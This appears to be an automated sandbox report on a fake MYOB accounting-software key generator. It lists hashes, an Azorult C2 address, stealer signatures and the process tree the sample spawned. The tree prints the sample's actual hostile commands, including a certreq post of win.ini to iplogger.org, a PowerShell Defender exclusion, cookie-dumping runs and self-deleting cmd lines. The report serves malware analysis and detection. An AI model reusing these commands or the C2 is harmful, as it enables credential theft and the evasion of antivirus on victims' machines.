Analysis

  • max time kernel
    37s
  • max time network
    61s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    10-03-2021 05:22

General

  • Target

    Myob_Accountright_Plus_19_0_key_generator.exe

  • Size

    8.2MB

  • MD5

    952996743eb4a668b63ede4dfb4c955a

  • SHA1

    d2094fc439aae23d2dd4a3e353867bede987cf8d

  • SHA256

    ac0fd3d8f29a9ba792cc7e9f6aa6f077354ebccbd3e68cfa81cf6dd3e5247f30

  • SHA512

    da3b52ec006537fefe96ca3ed103004886c093492e1c2d015a7c69ea52891960d585b6092e62d736ea7166fc93aa2a073c5b10351b032852e825764446710f42

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 6 IoCs
  • Executes dropped EXE 23 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Myob_Accountright_Plus_19_0_key_generator.exe
    "C:\Users\Admin\AppData\Local\Temp\Myob_Accountright_Plus_19_0_key_generator.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4688
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3836
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4304
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1392
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:1896
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:4068
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3392
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1296
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:2264
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4300
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies system certificate store
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1632
            • C:\Windows\SysWOW64\msiexec.exe
              msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
              5⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:2424
            • C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
              C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
              5⤵
              • Executes dropped EXE
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetThreadContext
              • Checks SCSI registry key(s)
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:196
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:524
              • C:\Users\Admin\AppData\Roaming\1615354019749.exe
                "C:\Users\Admin\AppData\Roaming\1615354019749.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354019749.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4500
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4324
              • C:\Users\Admin\AppData\Roaming\1615354024265.exe
                "C:\Users\Admin\AppData\Roaming\1615354024265.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354024265.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4400
              • C:\Users\Admin\AppData\Roaming\1615354029749.exe
                "C:\Users\Admin\AppData\Roaming\1615354029749.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354029749.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4512
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4308
              • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                6⤵
                  PID:5872
              • C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
                C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
                5⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • Checks SCSI registry key(s)
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4316
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  6⤵
                    PID:3800
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      7⤵
                      • Kills process with taskkill
                      PID:4404
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
                    6⤵
                      PID:888
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        7⤵
                        • Runs ping.exe
                        PID:3256
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1328
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      6⤵
                      • Runs ping.exe
                      PID:4616
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                  4⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious use of WriteProcessMemory
                  PID:2936
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3992
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      6⤵
                      • Kills process with taskkill
                      PID:2976
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4464
                  • C:\Users\Admin\AppData\Local\Temp\8WP6WZ3H79\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\8WP6WZ3H79\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:936
                    • C:\Users\Admin\AppData\Local\Temp\8WP6WZ3H79\multitimer.exe
                      "C:\Users\Admin\AppData\Local\Temp\8WP6WZ3H79\multitimer.exe" 1 3.1615353813.604857d513246 101
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:4392
                      • C:\Users\Admin\AppData\Local\Temp\8WP6WZ3H79\multitimer.exe
                        "C:\Users\Admin\AppData\Local\Temp\8WP6WZ3H79\multitimer.exe" 2 3.1615353813.604857d513246
                        7⤵
                        • Executes dropped EXE
                        • Checks for any installed AV software in registry
                        • Maps connected drives based on registry
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4612
                        • C:\Users\Admin\AppData\Local\Temp\ocyjufnyecv\wwo44fntksp.exe
                          "C:\Users\Admin\AppData\Local\Temp\ocyjufnyecv\wwo44fntksp.exe" /VERYSILENT
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:3488
                          • C:\Users\Admin\AppData\Local\Temp\is-K73O9.tmp\wwo44fntksp.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-K73O9.tmp\wwo44fntksp.tmp" /SL5="$601A4,870426,780800,C:\Users\Admin\AppData\Local\Temp\ocyjufnyecv\wwo44fntksp.exe" /VERYSILENT
                            9⤵
                              PID:3264
                              • C:\Users\Admin\AppData\Local\Temp\is-NVILD.tmp\winlthst.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-NVILD.tmp\winlthst.exe" test1 test1
                                10⤵
                                  PID:5324
                            • C:\Users\Admin\AppData\Local\Temp\553rxsbi3wq\vpn.exe
                              "C:\Users\Admin\AppData\Local\Temp\553rxsbi3wq\vpn.exe" /silent /subid=482
                              8⤵
                                PID:4444
                                • C:\Users\Admin\AppData\Local\Temp\is-HC2OP.tmp\vpn.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-HC2OP.tmp\vpn.tmp" /SL5="$4023C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\553rxsbi3wq\vpn.exe" /silent /subid=482
                                  9⤵
                                    PID:4744
                                • C:\Users\Admin\AppData\Local\Temp\gnbas33y1lb\ctfhhrjgh0f.exe
                                  "C:\Users\Admin\AppData\Local\Temp\gnbas33y1lb\ctfhhrjgh0f.exe" 57a764d042bf8
                                  8⤵
                                    PID:5048
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k "C:\Program Files\M06EN97BIJ\ZPDTV9DCH.exe" 57a764d042bf8 & exit
                                      9⤵
                                        PID:5996
                                        • C:\Program Files\M06EN97BIJ\ZPDTV9DCH.exe
                                          "C:\Program Files\M06EN97BIJ\ZPDTV9DCH.exe" 57a764d042bf8
                                          10⤵
                                            PID:4776
                                      • C:\Users\Admin\AppData\Local\Temp\pm14ctfvjao\askinstall24.exe
                                        "C:\Users\Admin\AppData\Local\Temp\pm14ctfvjao\askinstall24.exe"
                                        8⤵
                                          PID:4784
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            9⤵
                                              PID:2168
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                10⤵
                                                • Kills process with taskkill
                                                PID:5360
                                          • C:\Users\Admin\AppData\Local\Temp\vwot3t4izo4\Setup3310.exe
                                            "C:\Users\Admin\AppData\Local\Temp\vwot3t4izo4\Setup3310.exe" /Verysilent /subid=577
                                            8⤵
                                              PID:4804
                                              • C:\Users\Admin\AppData\Local\Temp\is-V9M5V.tmp\Setup3310.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-V9M5V.tmp\Setup3310.tmp" /SL5="$600C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\vwot3t4izo4\Setup3310.exe" /Verysilent /subid=577
                                                9⤵
                                                  PID:1564
                                                  • C:\Users\Admin\AppData\Local\Temp\is-BKH9C.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-BKH9C.tmp\Setup.exe" /Verysilent
                                                    10⤵
                                                      PID:5672
                                                      • C:\Users\Admin\AppData\Local\Temp\is-CU956.tmp\Setup.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-CU956.tmp\Setup.tmp" /SL5="$20434,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BKH9C.tmp\Setup.exe" /Verysilent
                                                        11⤵
                                                          PID:5704
                                                  • C:\Users\Admin\AppData\Local\Temp\j3jwj3k3tde\b2fqjqgip1l.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\j3jwj3k3tde\b2fqjqgip1l.exe" testparams
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:2212
                                                    • C:\Users\Admin\AppData\Roaming\b5reyvtgtll\qdbtvurfeyp.exe
                                                      "C:\Users\Admin\AppData\Roaming\b5reyvtgtll\qdbtvurfeyp.exe" /VERYSILENT /p=testparams
                                                      9⤵
                                                        PID:6040
                                                        • C:\Users\Admin\AppData\Local\Temp\is-BG9S4.tmp\qdbtvurfeyp.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-BG9S4.tmp\qdbtvurfeyp.tmp" /SL5="$4023A,552809,216064,C:\Users\Admin\AppData\Roaming\b5reyvtgtll\qdbtvurfeyp.exe" /VERYSILENT /p=testparams
                                                          10⤵
                                                            PID:6096
                                                      • C:\Users\Admin\AppData\Local\Temp\gv052u14o1d\chashepro3.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\gv052u14o1d\chashepro3.exe" /VERYSILENT
                                                        8⤵
                                                          PID:3396
                                                          • C:\Users\Admin\AppData\Local\Temp\is-9H6OI.tmp\chashepro3.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-9H6OI.tmp\chashepro3.tmp" /SL5="$1029C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\gv052u14o1d\chashepro3.exe" /VERYSILENT
                                                            9⤵
                                                              PID:2316
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /c "start https://iplogger.org/1aSny7"
                                                                10⤵
                                                                  PID:2164
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
                                                                  10⤵
                                                                    PID:1940
                                                                  • C:\Program Files (x86)\JCleaner\Venita.exe
                                                                    "C:\Program Files (x86)\JCleaner\Venita.exe"
                                                                    10⤵
                                                                      PID:3984
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
                                                                      10⤵
                                                                        PID:1464
                                                                        • C:\Windows\SysWOW64\certreq.exe
                                                                          certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
                                                                          11⤵
                                                                            PID:2952
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "cmd.exe" /c "start https://iplogger.org/1EaGq7"
                                                                          10⤵
                                                                            PID:3600
                                                                          • C:\Program Files (x86)\JCleaner\mex.exe
                                                                            "C:\Program Files (x86)\JCleaner\mex.exe"
                                                                            10⤵
                                                                              PID:5028
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
                                                                              10⤵
                                                                                PID:4680
                                                                              • C:\Program Files (x86)\JCleaner\Brava.exe
                                                                                "C:\Program Files (x86)\JCleaner\Brava.exe"
                                                                                10⤵
                                                                                  PID:1388
                                                                            • C:\Users\Admin\AppData\Local\Temp\a2ttdty2cgu\1wpgibwzi5a.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\a2ttdty2cgu\1wpgibwzi5a.exe" /ustwo INSTALL
                                                                              8⤵
                                                                                PID:2960
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 652
                                                                                  9⤵
                                                                                  • Program crash
                                                                                  PID:5864
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 664
                                                                                  9⤵
                                                                                  • Program crash
                                                                                  PID:5944
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 668
                                                                                  9⤵
                                                                                  • Program crash
                                                                                  PID:6104
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 672
                                                                                  9⤵
                                                                                  • Program crash
                                                                                  PID:5388
                                                                              • C:\Users\Admin\AppData\Local\Temp\yqravep3ewh\IBInstaller_97039.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\yqravep3ewh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                8⤵
                                                                                  PID:4532
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-ST0E8.tmp\IBInstaller_97039.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-ST0E8.tmp\IBInstaller_97039.tmp" /SL5="$202CA,14439881,721408,C:\Users\Admin\AppData\Local\Temp\yqravep3ewh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                    9⤵
                                                                                      PID:4172
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                        10⤵
                                                                                          PID:3920
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-29T28.tmp\{app}\chrome_proxy.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-29T28.tmp\{app}\chrome_proxy.exe"
                                                                                          10⤵
                                                                                            PID:452
                                                                                      • C:\Users\Admin\AppData\Local\Temp\5f4epgyvgn1\app.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\5f4epgyvgn1\app.exe" /8-23
                                                                                        8⤵
                                                                                          PID:4600
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Fragrant-Hill"
                                                                                            9⤵
                                                                                              PID:5240
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:1164
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4596
                                                                                    • C:\Users\Admin\AppData\Roaming\98CB.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\98CB.tmp.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:1080
                                                                                      • C:\Users\Admin\AppData\Roaming\98CB.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\98CB.tmp.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2132
                                                                                    • C:\Users\Admin\AppData\Roaming\9997.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\9997.tmp.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3012
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                      5⤵
                                                                                        PID:2644
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          6⤵
                                                                                          • Runs ping.exe
                                                                                          PID:3172
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                      4⤵
                                                                                        PID:1084
                                                                                        • C:\ProgramData\1133264.12
                                                                                          "C:\ProgramData\1133264.12"
                                                                                          5⤵
                                                                                            PID:5412
                                                                                          • C:\ProgramData\5615913.61
                                                                                            "C:\ProgramData\5615913.61"
                                                                                            5⤵
                                                                                              PID:5444
                                                                                            • C:\ProgramData\3046115.33
                                                                                              "C:\ProgramData\3046115.33"
                                                                                              5⤵
                                                                                                PID:5484
                                                                                              • C:\ProgramData\7999551.87
                                                                                                "C:\ProgramData\7999551.87"
                                                                                                5⤵
                                                                                                  PID:5540
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                4⤵
                                                                                                  PID:5600
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    5⤵
                                                                                                      PID:4740
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                              1⤵
                                                                                              • Enumerates connected drives
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4668
                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding C996F255F6C777C0B51477F48B1B51F4 C
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:4624

                                                                                            Network

                                                                                            MITRE ATT&CK Enterprise v6

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • memory/196-46-0x00000000035A0000-0x0000000003A4F000-memory.dmp

                                                                                              Filesize

                                                                                              4.7MB

                                                                                            • memory/452-253-0x0000000000400000-0x000000000058B000-memory.dmp

                                                                                              Filesize

                                                                                              1.5MB

                                                                                            • memory/452-252-0x00000000025F0000-0x000000000277B000-memory.dmp

                                                                                              Filesize

                                                                                              1.5MB

                                                                                            • memory/524-54-0x0000010FCE2F0000-0x0000010FCE2F1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/524-53-0x0000000010000000-0x0000000010057000-memory.dmp

                                                                                              Filesize

                                                                                              348KB

                                                                                            • memory/936-76-0x0000000002860000-0x0000000002862000-memory.dmp

                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/936-75-0x00007FFEE4420000-0x00007FFEE4DC0000-memory.dmp

                                                                                              Filesize

                                                                                              9.6MB

                                                                                            • memory/1080-121-0x0000000003170000-0x0000000003171000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1080-130-0x0000000002C00000-0x0000000002C45000-memory.dmp

                                                                                              Filesize

                                                                                              276KB

                                                                                            • memory/1084-178-0x00007FFEE6950000-0x00007FFEE733C000-memory.dmp

                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/1084-211-0x0000000000D50000-0x0000000000D80000-memory.dmp

                                                                                              Filesize

                                                                                              192KB

                                                                                            • memory/1084-254-0x000000001C880000-0x000000001C882000-memory.dmp

                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/1084-193-0x0000000000620000-0x0000000000621000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-313-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-207-0x0000000004EA0000-0x0000000004EA1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-259-0x0000000002374000-0x0000000002376000-memory.dmp

                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/1388-200-0x0000000002370000-0x0000000002371000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-312-0x0000000005660000-0x0000000005661000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-323-0x0000000006000000-0x0000000006001000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-199-0x0000000002320000-0x0000000002348000-memory.dmp

                                                                                              Filesize

                                                                                              160KB

                                                                                            • memory/1388-187-0x00000000023B0000-0x00000000023B1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-203-0x0000000002372000-0x0000000002373000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-315-0x0000000005D10000-0x0000000005D11000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-190-0x00000000713E0000-0x0000000071ACE000-memory.dmp

                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/1388-204-0x0000000002610000-0x0000000002636000-memory.dmp

                                                                                              Filesize

                                                                                              152KB

                                                                                            • memory/1388-208-0x0000000002373000-0x0000000002374000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1388-311-0x0000000005480000-0x0000000005481000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1392-25-0x0000000002BA0000-0x0000000002D3C000-memory.dmp

                                                                                              Filesize

                                                                                              1.6MB

                                                                                            • memory/1564-234-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-181-0x0000000005040000-0x0000000005041000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-185-0x0000000005050000-0x0000000005051000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-179-0x0000000005030000-0x0000000005031000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-176-0x0000000005020000-0x0000000005021000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-175-0x0000000005010000-0x0000000005011000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-169-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-172-0x0000000005000000-0x0000000005001000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-167-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-165-0x0000000003931000-0x000000000395C000-memory.dmp

                                                                                              Filesize

                                                                                              172KB

                                                                                            • memory/1564-188-0x0000000005060000-0x0000000005061000-memory.dmp

                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/1564-195-0x0000000005070000-0x0000000005071000-memory.dmp

                                                                                              Filesize

